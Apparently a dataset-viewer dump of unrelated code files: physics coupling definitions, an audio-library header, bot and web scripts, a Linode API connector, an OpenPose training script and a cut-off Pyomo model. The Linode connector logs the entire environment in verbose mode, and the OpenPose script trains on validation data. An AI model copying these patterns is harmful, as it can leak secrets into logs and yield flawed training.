text
stringlengths 3
1.05M
|
|---|
# This file was automatically created by FeynRules $Revision: 535 $
# Mathematica version: 7.0 for Mac OS X x86 (64-bit) (November 11, 2008)
# Date: Fri 18 Mar 2011 18:40:51
from object_library import all_couplings, Coupling
from function_library import complexconjugate, re, im, csc, sec, acsc, asec
################
# R2 couplings #
################
R2_3Gq = Coupling(name = 'R2_3Gq',
value = '2.0*G**3/(48.0*cmath.pi**2)',
order = {'QCD':3})
R2_3Gg = Coupling(name = 'R2_3Gg',
value = 'Ncol*G**3/(48.0*cmath.pi**2)*(7.0/4.0+lhv)',
order = {'QCD':3})
#=============================================================================================
# 4-gluon R2 couplings
#=============================================================================================
# Gluon contribution to it
GC_4GR2_Gluon_delta5 = Coupling(name = 'GC_4GR2_Gluon_delta5',
value = '-4.0*complex(0,1)*RGR2*(2.0*lhv+5.0)',
order = {'QCD':4})
GC_4GR2_Gluon_delta7 = Coupling(name = 'GC_4GR2_Gluon_delta7',
value = '2.0*complex(0,1)*RGR2*(2.0*lhv+7.0)',
order = {'QCD':4})
GC_4GR2_2Struct = Coupling(name = 'GC_4GR2_2Struct',
value = '2.0*complex(0,1)*RGR2*Ncol*(lhv+3.0)',
order = {'QCD':4})
GC_4GR2_4Struct = Coupling(name = 'GC_4GR2_4Struct',
value = '-complex(0,1)*RGR2*Ncol*(4.0*lhv+11.0)',
order = {'QCD':4})
# Fermion contribution to it
GC_4GR2_Fermion_delta5 = Coupling(name = 'GC_4GR2_Fermion_delta5',
value = '(2.0/Ncol)*5.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_Fermion_delta11 = Coupling(name = 'GC_4GR2_Fermion_delta11',
value = '-(2.0/Ncol)*11.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_5Struct = Coupling(name = 'GC_4GR2_5Struct',
value = '5.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_11Struct = Coupling(name = 'GC_4GR2_11Struct',
value = '-11.0*complex(0,1)*RGR2',
order = {'QCD':4})
#=============================================================================================
R2_GQQ = Coupling(name = 'R2_GQQ',
value = '-complex(0,1)*G**3/(16.0*cmath.pi**2)*((Ncol**2-1)/(2.0*Ncol))*(1.0+lhv)',
order = {'QCD':3})
R2_GGq = Coupling(name = 'R2_GGq',
value = 'complex(0,1)*G**2/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGb = Coupling(name = 'R2_GGb',
value = 'complex(0,1)*G**2*(-6.0*MB**2)/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGt = Coupling(name = 'R2_GGt',
value = 'complex(0,1)*G**2*(-6.0*MT**2)/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGg_1 = Coupling(name = 'R2_GGg_1',
value = 'complex(0,1)*G**2*Ncol/(48.0*cmath.pi**2)*(1.0/2.0+lhv)',
order = {'QCD':2})
R2_GGg_2 = Coupling(name = 'R2_GGg_2',
value = '-complex(0,1)*G**2*Ncol/(48.0*cmath.pi**2)*lhv',
order = {'QCD':2})
R2_QQq = Coupling(name = 'R2_QQq',
value = 'complex(0,1)*G**2*(Ncol**2-1)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
R2_QQb = Coupling(name = 'R2_QQb',
value = 'complex(0,1)*G**2*(Ncol**2-1)*(-2.0*MB)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
R2_QQt = Coupling(name = 'R2_QQt',
value = 'complex(0,1)*G**2*(Ncol**2-1)*(-2.0*MT)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
################
# UV couplings #
################
UV_3Gg = Coupling(name = 'UV_3Gg',
value = '-G_UVg*G',
order = {'QCD':3})
UV_3Gq = Coupling(name = 'UV_3Gq',
value = '-G_UVq*G',
order = {'QCD':3})
UV_3Gb = Coupling(name = 'UV_3Gb',
value = '-G_UVb*G',
order = {'QCD':3})
UV_3Gt = Coupling(name = 'UV_3Gt',
value = '-G_UVt*G',
order = {'QCD':3})
UV_4Gg = Coupling(name = 'UV_4Gg',
value = '2.0*complex(0,1)*G_UVg*(G**2)',
order = {'QCD':4})
UV_4Gq = Coupling(name = 'UV_4Gq',
value = '2.0*complex(0,1)*G_UVq*(G**2)',
order = {'QCD':4})
UV_4Gb = Coupling(name = 'UV_4Gb',
value = '2.0*complex(0,1)*G_UVb*(G**2)',
order = {'QCD':4})
UV_4Gt = Coupling(name = 'UV_4Ggt',
value = '2.0*complex(0,1)*G_UVt*(G**2)',
order = {'QCD':4})
UV_GQQg = Coupling(name = 'UV_GQQg',
value = 'complex(0,1)*G_UVg*G',
order = {'QCD':3})
UV_GQQq = Coupling(name = 'UV_GQQq',
value = 'complex(0,1)*G_UVq*G',
order = {'QCD':3})
UV_GQQb = Coupling(name = 'UV_GQQb',
value = 'complex(0,1)*G_UVb*G',
order = {'QCD':3})
UV_GQQt = Coupling(name = 'UV_GQQt',
value = 'complex(0,1)*G_UVt*G',
order = {'QCD':3})
UV_bMass = Coupling(name = 'UV_bMass',
value = 'bMass_UV',
order = {'QCD':2})
UV_tMass = Coupling(name = 'UV_tMass',
value = 'tMass_UV',
order = {'QCD':2})
|
/*
Copyright (C) 2014 Paul Brossier <piem@aubio.org>
This file is part of aubio.
aubio is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
aubio is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with aubio. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef AUBIO_SOURCE_WAVREAD_H
#define AUBIO_SOURCE_WAVREAD_H
/** \file
Read from file using custom wav reading routines.
Avoid including this file directly! Prefer using ::aubio_source_t instead to
make your code portable.
To write to file, use ::aubio_sink_t.
References:
- http://netghost.narod.ru/gff/graphics/summary/micriff.htm
- https://ccrma.stanford.edu/courses/422/projects/WaveFormat/
\example io/test-source_wavread.c
*/
#ifdef __cplusplus
extern "C" {
#endif
/** wavread media source object */
typedef struct _aubio_source_wavread_t aubio_source_wavread_t;
/**
create new ::aubio_source_wavread_t
\param uri the file path or uri to read from
\param samplerate sampling rate to view the fie at
\param hop_size the size of the blocks to read from
Creates a new source object. If `0` is passed as `samplerate`, the sample
rate of the original file is used.
The samplerate of newly created source can be obtained using
::aubio_source_wavread_get_samplerate.
*/
aubio_source_wavread_t * new_aubio_source_wavread(const char_t * uri, uint_t samplerate, uint_t hop_size);
/**
read monophonic vector of length hop_size from source object
\param s source object, created with ::new_aubio_source_wavread
\param read_to ::fvec_t of data to read to
\param[out] read upon returns, equals to number of frames actually read
Upon returns, `read` contains the number of frames actually read from the
source. `hop_size` if enough frames could be read, less otherwise.
*/
void aubio_source_wavread_do(aubio_source_wavread_t * s, fvec_t * read_to, uint_t * read);
/**
read polyphonic vector of length hop_size from source object
\param s source object, created with ::new_aubio_source_wavread
\param read_to ::fmat_t of data to read to
\param read upon returns, equals to number of frames actually read
Upon returns, `read` contains the number of frames actually read from the
source. `hop_size` if enough frames could be read, less otherwise.
*/
void aubio_source_wavread_do_multi(aubio_source_wavread_t * s, fmat_t * read_to, uint_t * read);
/**
get samplerate of source object
\param s source object, created with ::new_aubio_source_wavread
\return samplerate, in Hz
*/
uint_t aubio_source_wavread_get_samplerate(aubio_source_wavread_t * s);
/**
get number of channels of source object
\param s source object, created with ::new_aubio_source_wavread
\return number of channels
*/
uint_t aubio_source_wavread_get_channels (aubio_source_wavread_t * s);
/**
seek source object
\param s source object, created with ::new_aubio_source_wavread
\param pos position to seek to, in frames
\return 0 if sucessful, non-zero on failure
*/
uint_t aubio_source_wavread_seek (aubio_source_wavread_t *s, uint_t pos);
/**
get the duration of source object, in frames
\param s source object, created with ::new_aubio_source_sndfile
\return number of frames in file
*/
uint_t aubio_source_wavread_get_duration (const aubio_source_wavread_t *s);
/**
close source
\param s source object, created with ::new_aubio_source_wavread
\return 0 if sucessful, non-zero on failure
*/
uint_t aubio_source_wavread_close (aubio_source_wavread_t *s);
/**
close source and cleanup memory
\param s source object, created with ::new_aubio_source_wavread
*/
void del_aubio_source_wavread(aubio_source_wavread_t * s);
#ifdef __cplusplus
}
#endif
#endif /* AUBIO_SOURCE_WAVREAD_H */
|
const Command = require('../Command');
const messages = {
'errorChecking': 'Hmm.. I encountered some issues looking up the players. Is Shotbow.net offline?',
'errorBadKey': 'Hmm.. I couldn\'t find the game you were talking about. Try again?',
'result': 'There { count, plural, one {is currently # player} other {are currently # players} } connected to {game}.',
'help': 'You can use `!playercount` to show the players connected to the network or some of the games.\nYou can use any of the following names: {names}'
};
const cacheTTL = 10 * 1000; // 10 seconds in milliseconds
module.exports = Command.extend({
shouldDeleteMessage: true,
commandName: 'playercount',
https: null,
cache: null,
cacheKey: 'serverlist',
dependencies: {
'commandPrefix': 'commandPrefix',
'https': 'https',
'Cache': 'cache'
},
processMessage: async function (message, tokens) {
return await this.fetchServerlist().then(serverList => {
if (serverList === false) {
return message.channel.send(this.i18n.__mf(messages.errorChecking));
}
tokens.shift();
let key = this.getGameKey(tokens.join(' ').trim(), message.channel.id);
if (key === 'help') {
let list = Object.values(this.config.games.names)
.map(item => {
return '`' + item + '`'
})
.join(', ');
return message.channel.send(this.i18n.__mf(messages.help, {names: list}));
}
if (typeof this.config.games.names[key] === 'undefined' || typeof serverList[key] === 'undefined') {
return message.channel.send(this.i18n.__mf(messages.errorBadKey, {key: key}));
}
let gameName = this.config.games.names[key];
let count = serverList[key];
return message.channel.send(this.i18n.__mf(messages.result, {count: count, game: gameName}));
}).catch(e => {
console.error(e);
});
},
getGameKey: function (requestedGame, room) {
if (!requestedGame) {
return typeof this.config.games.rooms[room] !== 'undefined' ? this.config.games.rooms[room] : 'all';
}
requestedGame = requestedGame.toLowerCase();
if (this.config.games.aliases[requestedGame]) {
requestedGame = this.config.games.aliases[requestedGame];
}
return requestedGame;
},
fetchServerlist: function() {
return new Promise((resolve, reject) => {
let cachedData = this.cache.get(this.cacheKey);
if (cachedData) {
resolve(cachedData);
return;
}
this.https.get('https://shotbow.net/serverList.json', res => {
let responseData = '';
res.setEncoding('utf8');
res.on('data', data => {
responseData += data;
});
res.on('end', () => {
let serverList;
try {
serverList = JSON.parse(responseData);
if (serverList !== false) {
this.cache.set(this.cacheKey, serverList, cacheTTL);
}
resolve(serverList);
} catch (e) {
resolve(false);
}
});
});
});
}
});
|
if (document.querySelector('#com-atlassian-confluence')) {
console.log(" -- cf-auto-expander");
/* jquery-based auto-expander */
// $('.expand-control > .icon:not(.expanded)')
// .parent()
// .click();
/* pure-js auto-expander */
[]
.slice.call(document.querySelectorAll('.expand-control > .icon:not(.expanded)'))
.map(function (e) { return (e.parentNode); })
.filter(function (e) { return (e !== null); })
.forEach(function (e) { e.click(); });
}
|
$(function() {
var data_to_pass = {},
dg_status = $("#dg_status").val();
if(dg_status) {
data_to_pass = {
"dg_status": dg_status
}
}
// get vars
$.ajax({
url: "/url/to/ajax_get_vars.php",
type: "POST",
data: data_to_pass,
dataType: 'json',
success: function(data) {
var elem_php_bs_grid = $("#php_bs_grid_form");
elem_php_bs_grid.php_bs_grid({
addnew_record_url: data["addnew_record_url"],
criteria: data["criteria"],
msg_criteria_not_changed: data["msg_criteria_not_changed"],
msg_apply_or_reset_criteria: data["msg_apply_or_reset_criteria"],
ajax_validate_form_url: data["ajax_validate_form_url"],
ajax_reset_all_url: data["ajax_reset_all_url"],
bs_modal_id: data["bs_modal_id"],
bs_modal_content_id: data["bs_modal_content_id"]
});
}
});
});
|
"""Support for sending data to Dweet.io."""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import (
CONF_NAME, CONF_WHITELIST, EVENT_STATE_CHANGED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
REQUIREMENTS = ['dweepy==0.3.0']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'dweet'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST, default=[]):
vol.All(cv.ensure_list, [cv.entity_id]),
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up the Dweet.io component."""
conf = config[DOMAIN]
name = conf.get(CONF_NAME)
whitelist = conf.get(CONF_WHITELIST)
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data to Dweet.io: %s", msg)
|
var project = (function(obj)
{
var plugin_path = "../plugin/project";
obj.plugin_path = plugin_path;
obj.init = function()
{
central.project = {};
//support.loadJS(plugin_path+"/new_project.js");
support.loadJS(plugin_path+"/open_project.js");
support.loadJS(plugin_path+"/project_tree.js");
support.loadJS(plugin_path+"/compile.ui.js");
support.loadJS(plugin_path+"/compile.js");
};
obj.destroy = function()
{
console.log('destroy');
};
return obj;
})(project||{});
|
"use strict";
exports.__esModule = true;
/**
* Returns true if any item within the haystack contains the needle
* @param {string} needle
* @param {array} haystack
* @return {boolean}
*/
exports["default"] = (function (needle, haystack) {
if (needle === void 0) { needle = ''; }
if (haystack === void 0) { haystack = []; }
for (var i = 0; i < haystack.length; ++i) {
var item = haystack[i];
if (needle === item) {
return true;
}
if (item.indexOf(needle) !== -1) {
return true;
}
}
return false;
});
|
#!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import sys
import hasher
import json5_generator
import name_utilities
import template_expander
from aria_properties import ARIAReader
from json5_generator import Json5File
def _symbol(entry):
return 'k' + entry['name'].to_upper_camel_case()
class MakeQualifiedNamesWriter(json5_generator.Writer):
default_parameters = {}
default_metadata = {
'attrsNullNamespace': None,
'export': '',
'namespace': '',
'namespacePrefix': '',
'namespaceURI': '',
}
filters = {
'hash': hasher.hash,
'symbol': _symbol,
}
def __init__(self, json5_file_paths, output_dir):
super(MakeQualifiedNamesWriter, self).__init__(None, output_dir)
self._input_files = copy.copy(json5_file_paths)
assert len(json5_file_paths) <= 3, \
'MakeQualifiedNamesWriter requires at most 3 in files, got %d.' % \
len(json5_file_paths)
# Input files are in a strict order with more optional files *first*:
# 1) ARIA properties
# 2) Tags
# 3) Attributes
if len(json5_file_paths) >= 3:
aria_json5_filename = json5_file_paths.pop(0)
self.aria_reader = ARIAReader(aria_json5_filename)
else:
self.aria_reader = None
if len(json5_file_paths) >= 2:
tags_json5_filename = json5_file_paths.pop(0)
self.tags_json5_file = Json5File.load_from_files(
[tags_json5_filename], self.default_metadata,
self.default_parameters)
else:
self.tags_json5_file = None
self.attrs_json5_file = Json5File.load_from_files(
[json5_file_paths.pop()], self.default_metadata,
self.default_parameters)
if self.aria_reader is not None:
self.attrs_json5_file.merge_from(
self.aria_reader.attributes_list())
self.namespace = self._metadata('namespace')
cpp_namespace = self.namespace.lower() + '_names'
namespace_prefix = self._metadata('namespacePrefix') or 'k'
namespace_uri = self._metadata('namespaceURI')
use_namespace_for_attrs = self.attrs_json5_file.metadata[
'attrsNullNamespace'] is None
self._outputs = {
(self.namespace.lower() + "_names.h"): self.generate_header,
(self.namespace.lower() + "_names.cc"):
self.generate_implementation,
}
qualified_header = self._relative_output_dir + self.namespace.lower(
) + '_names.h'
self._template_context = {
'attrs':
self.attrs_json5_file.name_dictionaries,
'cpp_namespace':
cpp_namespace,
'export':
self._metadata('export'),
'header_guard':
self.make_header_guard(qualified_header),
'input_files':
self._input_files,
'namespace':
self.namespace,
'namespace_prefix':
namespace_prefix,
'namespace_uri':
namespace_uri,
'tags':
self.tags_json5_file.name_dictionaries
if self.tags_json5_file else [],
'this_include_path':
qualified_header,
'use_namespace_for_attrs':
use_namespace_for_attrs,
}
def _metadata(self, name):
metadata = self.attrs_json5_file.metadata[name].strip('"')
if self.tags_json5_file:
assert metadata == self.tags_json5_file.metadata[name].strip(
'"'), 'Both files must have the same %s.' % name
return metadata
@template_expander.use_jinja(
'templates/make_qualified_names.h.tmpl', filters=filters)
def generate_header(self):
return self._template_context
@template_expander.use_jinja(
'templates/make_qualified_names.cc.tmpl', filters=filters)
def generate_implementation(self):
return self._template_context
if __name__ == "__main__":
json5_generator.Maker(MakeQualifiedNamesWriter).main()
|
$(document).ready(function() {
var timeout = setTimeout(function() {
$('.check').on('click', function() {
if ($(this).hasClass('checked')) {
$(this).removeClass('checked');
} else {
$(this).addClass('checked');
}
});
}, 1000);
});
|
"""
WSGI config for project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
# from whitenoise.django import DjangoWhiteNoise
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# application = DjangoWhiteNoise(application)
|
/**
* Auto-generated action file for "Linode" API.
*
* Generated at: 2019-06-06T13:12:27.533Z
* Mass generator version: 1.1.0
*
* flowground :- Telekom iPaaS / linode-com-connector
* Copyright © 2019, Deutsche Telekom AG
* contact: flowground@telekom.de
*
* All files of this connector are licensed under the Apache 2.0 License. For details
* see the file LICENSE on the toplevel directory.
*
*
* Operation: 'getLongviewSubscriptions'
* Endpoint Path: '/longview/subscriptions'
* Method: 'get'
*
*/
const Swagger = require('swagger-client');
const processWrapper = require('../services/process-wrapper');
const spec = require('../spec.json');
// this wrapers offers a simplified emitData(data) function
module.exports.process = processWrapper(processAction);
// parameter names for this call
const PARAMETERS = [
"page",
"page_size"
];
// mappings from connector field names to API field names
const FIELD_MAP = {
"page": "page",
"page_size": "page_size"
};
function processAction(msg, cfg) {
var isVerbose = process.env.debug || cfg.verbose;
if (isVerbose) {
console.log(`---MSG: ${JSON.stringify(msg)}`);
console.log(`---CFG: ${JSON.stringify(cfg)}`);
console.log(`---ENV: ${JSON.stringify(process.env)}`);
}
const contentType = undefined;
const body = msg.body;
mapFieldNames(body);
let parameters = {};
for(let param of PARAMETERS) {
parameters[param] = body[param];
}
// credentials for this operation
let securities = {};
let callParams = {
spec: spec,
operationId: 'getLongviewSubscriptions',
pathName: '/longview/subscriptions',
method: 'get',
parameters: parameters,
requestContentType: contentType,
requestBody: body.requestBody,
securities: {authorized: securities},
server: spec.servers[cfg.server] || cfg.otherServer,
};
if (isVerbose) {
let out = Object.assign({}, callParams);
out.spec = '[omitted]';
console.log(`--SWAGGER CALL: ${JSON.stringify(out)}`);
}
// Call operation via Swagger client
return Swagger.execute(callParams).then(data => {
// emit a single message with data
this.emitData(data);
// if the response contains an array of entities, you can emit them one by one:
// data.obj.someItems.forEach((item) => {
// this.emitData(item);
// }
});
}
function mapFieldNames(obj) {
if(Array.isArray(obj)) {
obj.forEach(mapFieldNames);
}
else if(typeof obj === 'object' && obj) {
Object.keys(obj).forEach(key => {
mapFieldNames(obj[key]);
let goodKey = FIELD_MAP[key];
if(goodKey && goodKey !== key) {
obj[goodKey] = obj[key];
delete obj[key];
}
});
}
}
|
import React, { Component } from 'react';
import PropTypes from 'prop-types';
import { translate } from 'react-i18next';
import style from './style.styl';
class Switch extends Component {
static defaultProps = {
selected: false,
apply: () => {}
}
static propTypes = {
selected: PropTypes.bool,
apply: PropTypes.func
}
constructor (props) {
super()
this.state = {
selected: props.selected
}
this.apply = props.apply.bind(this)
}
onChange () {
this.setState(prev => ({selected: !this.state.selected}))
this.apply(this.state.selected)
}
render () {
let {props, state} = this
return (
<label className={style.switch}>
<input className={style['settings-checkbox']} checked={state.selected} type="checkbox" onChange={this.onChange.bind(this)}/>
<div className={style.slider}></div>
</label>
)
}
}
export default translate(['switch'])(Switch);
|
import random
import math
import time
import pandas as pd
import numpy as np
import torch
import torch.utils.data as data
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# Thiết định các giá trị ban đầu
torch.manual_seed(1234)
np.random.seed(1234)
random.seed(1234)
from utils.dataloader import make_datapath_list, DataTransform, COCOkeypointsDataset
# Tạo list từ MS COCO
train_img_list, train_mask_list, val_img_list, val_mask_list, train_meta_list, val_meta_list = make_datapath_list(
rootpath="./data/")
# 1024 data để train
# lấy số lượng là bội số của batch size
train_img_list = train_img_list[:1024]
train_mask_list = train_mask_list[:1024]
val_img_list = val_img_list[:1024]
val_mask_list = val_mask_list[:1024]
train_meta_list = train_meta_list[:1024]
# Tạo dataset
train_dataset = COCOkeypointsDataset(
val_img_list, val_mask_list, val_meta_list, phase="train", transform=DataTransform())
# Để đơn giản hóa trong bài này không tạo dữ liệu đánh giá
# val_dataset = CocokeypointsDataset(val_img_list, val_mask_list, val_meta_list, phase="val", transform=DataTransform())
# Tạo DataLoader
batch_size = 4
train_dataloader = data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=True)
dataloaders_dict = {"train": train_dataloader, "val": None}
# # Tạo Model
# In[4]:
from utils.openpose_net import OpenPoseNet
net = OpenPoseNet()
# # Định nghĩa hàm mất mát
# In[5]:
class OpenPoseLoss(nn.Module):
def __init__(self):
super(OpenPoseLoss, self).__init__()
def forward(self, saved_for_loss, heatmap_target, heat_mask, paf_target, paf_mask):
"""
tính loss
Parameters
----------
saved_for_loss : Output ofOpenPoseNet (list)
heatmap_target : [num_batch, 19, 46, 46]
Anotation information
heatmap_mask : [num_batch, 19, 46, 46]
paf_target : [num_batch, 38, 46, 46]
PAF Anotation
paf_mask : [num_batch, 38, 46, 46]
PAF mask
Returns
-------
loss :
"""
total_loss = 0
for j in range(6):
# Không tính những vị trí của mask
pred1 = saved_for_loss[2 * j] * paf_mask
gt1 = paf_target.float() * paf_mask
# heatmaps
pred2 = saved_for_loss[2 * j + 1] * heat_mask
gt2 = heatmap_target.float()*heat_mask
total_loss += F.mse_loss(pred1, gt1, reduction='mean') + F.mse_loss(pred2, gt2, reduction='mean')
return total_loss
criterion = OpenPoseLoss()
# # Thiết định optimizer
# In[6]:
optimizer = optim.SGD(net.parameters(), lr=1e-2,
momentum=0.9,
weight_decay=0.0001)
# # Thực hiện việc học
# In[7]:
def train_model(net, dataloaders_dict, criterion, optimizer, num_epochs):
# Xem máy train của bạn có dùng gpu hay không
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use:", device)
# chuyển thông tin model vào ram
net.to(device)
torch.backends.cudnn.benchmark = True
num_train_imgs = len(dataloaders_dict["train"].dataset)
batch_size = dataloaders_dict["train"].batch_size
iteration = 1
# vòng học
for epoch in range(num_epochs):
# lưu thời gian bắt đầu học
t_epoch_start = time.time()
t_iter_start = time.time()
epoch_train_loss = 0.0
epoch_val_loss = 0.0
print('-------------')
print('Epoch {}/{}'.format(epoch+1, num_epochs))
print('-------------')
# phân loại data học và kiểm chứng
for phase in ['train', 'val']:
if phase == 'train':
net.train()
optimizer.zero_grad()
print('(train)')
# lần này bỏ qua thông tin kiểm chứng
else:
continue
# net.eval()
# print('-------------')
# print('(val)')
# Lấy từng minibatch files từ data loader
for imges, heatmap_target, heat_mask, paf_target, paf_mask in dataloaders_dict[phase]:
if imges.size()[0] == 1:
continue
# Gửi data đến GPU nếu máy cài GPU
imges = imges.to(device)
heatmap_target = heatmap_target.to(device)
heat_mask = heat_mask.to(device)
paf_target = paf_target.to(device)
paf_mask = paf_mask.to(device)
# thiết lập giá trị khởi tạo cho optimizer
optimizer.zero_grad()
# tính forward
with torch.set_grad_enabled(phase == 'train'):
_, saved_for_loss = net(imges)
loss = criterion(saved_for_loss, heatmap_target,
heat_mask, paf_target, paf_mask)
del saved_for_loss
# gửi thông tin loss theo back propagation khi học
if phase == 'train':
loss.backward()
optimizer.step()
if (iteration % 10 == 0):
t_iter_finish = time.time()
duration = t_iter_finish - t_iter_start
print('イテレーション {} || Loss: {:.4f} || 10iter: {:.4f} sec.'.format(
iteration, loss.item()/batch_size, duration))
t_iter_start = time.time()
epoch_train_loss += loss.item()
iteration += 1
# Validation (skip)
# else:
#epoch_val_loss += loss.item()
t_epoch_finish = time.time()
print('-------------')
print('epoch {} || Epoch_TRAIN_Loss:{:.4f} ||Epoch_VAL_Loss:{:.4f}'.format(
epoch+1, epoch_train_loss/num_train_imgs, 0))
print('timer: {:.4f} sec.'.format(t_epoch_finish - t_epoch_start))
t_epoch_start = time.time()
# Lưu thông tin sau khi học
torch.save(net.state_dict(), 'weights/openpose_net_' +
str(epoch+1) + '.pth')
# In[ ]:
# HỌc (chạy 1 lần)
num_epochs = 2
train_model(net, dataloaders_dict, criterion, optimizer, num_epochs=num_epochs)
# In[ ]:
|
# MINLP written by GAMS Convert at 01/15/21 11:37:32
#
# Equation counts
# Total E G L N X C B
# 1115 397 80 638 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 605 485 120 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 2547 2415 132 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
